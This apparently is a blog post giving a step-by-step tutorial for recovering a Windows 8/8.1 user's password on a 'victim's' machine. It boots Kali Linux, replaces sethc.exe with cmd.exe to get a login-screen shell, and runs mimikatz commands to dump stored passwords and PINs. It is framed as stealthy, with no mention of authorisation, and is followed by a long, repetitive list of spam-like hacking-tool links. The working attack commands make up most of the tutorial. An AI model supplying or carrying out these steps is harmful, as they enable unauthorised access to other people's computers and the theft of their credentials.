DIG DEEPER TO FIND WATER & NOT WIDER -P.M.PATEL

Saturday, January 27, 2024

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)
Related articles

  1. Bluetooth Hacking Tools Kali
  2. Hacking Tools Windows 10
  3. Kik Hack Tools
  4. Pentest Tools Alternative
  5. Hak5 Tools
  6. Hacking Tools Mac
  7. Hackrf Tools
  8. Hack Tools
  9. Pentest Tools Tcp Port Scanner
  10. Black Hat Hacker Tools
  11. What Is Hacking Tools
  12. Pentest Reporting Tools
  13. Hacking Tools Name
  14. Termux Hacking Tools 2019
  15. Hacker
  16. Hacking Tools Download
  17. Hack Tools Mac
  18. Hack Tools For Windows
  19. Pentest Tools Linux
  20. Hacking Tools 2019
  21. Hacking Tools Software
  22. Hacker Tools Apk Download
  23. Hacking Tools Pc
  24. Ethical Hacker Tools
  25. Hacker Tools Hardware
  26. Hack And Tools
  27. Hacking Tools For Pc
  28. Hack Apps
  29. Hacker Tool Kit
  30. Pentest Tools For Mac
  31. Pentest Tools For Ubuntu
  32. Nsa Hack Tools Download
  33. Tools Used For Hacking
  34. Hack Tools For Windows
  35. Tools 4 Hack
  36. Pentest Tools For Android
  37. Hacker Tools
  38. Hacker Hardware Tools
  39. Hacker Tools Hardware
  40. Pentest Tools For Windows
  41. Hacker Search Tools
  42. Hak5 Tools
  43. Hackrf Tools
  44. Pentest Tools For Mac
  45. Hacking Tools Pc
  46. Hacking Tools 2020
  47. Hack Tools For Ubuntu
  48. Hacking Tools For Games
  49. Hacker Tools 2020
  50. Game Hacking
  51. Hacker Search Tools
  52. Game Hacking
  53. Hacking Tools For Mac
  54. Pentest Tools
  55. Best Hacking Tools 2020
  56. Hack Tools Mac
  57. Pentest Tools List
  58. Hack Tools Pc
  59. How To Install Pentest Tools In Ubuntu
  60. Easy Hack Tools
  61. Hacker Techniques Tools And Incident Handling
  62. Hack Tools For Windows
  63. Hacking Tools And Software
  64. Hacker Hardware Tools
  65. Hacking Tools Pc
  66. Hack Tools Github
  67. Hacker Tools For Mac
  68. Ethical Hacker Tools
  69. Hacker Tools Windows
  70. Physical Pentest Tools
  71. Game Hacking
  72. Hacking Tools And Software
  73. Hack Tool Apk No Root
  74. Usb Pentest Tools
  75. Tools Used For Hacking
  76. Hacking Tools 2020
  77. World No 1 Hacker Software
  78. New Hack Tools
  79. New Hacker Tools
  80. Pentest Reporting Tools
  81. Android Hack Tools Github
  82. Hack Tools Pc
  83. Pentest Tools Url Fuzzer
  84. Hacker Tools Mac
  85. Hack Tool Apk
  86. Kik Hack Tools
  87. Hak5 Tools
  88. Best Pentesting Tools 2018
  89. Hacking Tools Free Download
  90. Hack App
  91. Physical Pentest Tools
  92. Github Hacking Tools
  93. Hacker Tool Kit
  94. Free Pentest Tools For Windows
  95. Hacker Tools For Ios
  96. Hacker Security Tools
  97. Hacking Tools Software
  98. Android Hack Tools Github
  99. Hackrf Tools
  100. Hacker Tools Online
  101. Hacking Tools For Beginners
  102. Hacking Tools Github
  103. Nsa Hack Tools
  104. How To Make Hacking Tools
  105. Hacker Tools 2020
  106. Nsa Hack Tools Download
  107. Hack Tools
  108. What Are Hacking Tools
  109. Hacking Tools Github
  110. Hacker Tools Windows
  111. New Hacker Tools
  112. Hacking Tools Online
  113. Physical Pentest Tools
  114. Pentest Tools Open Source

No comments:

Post a Comment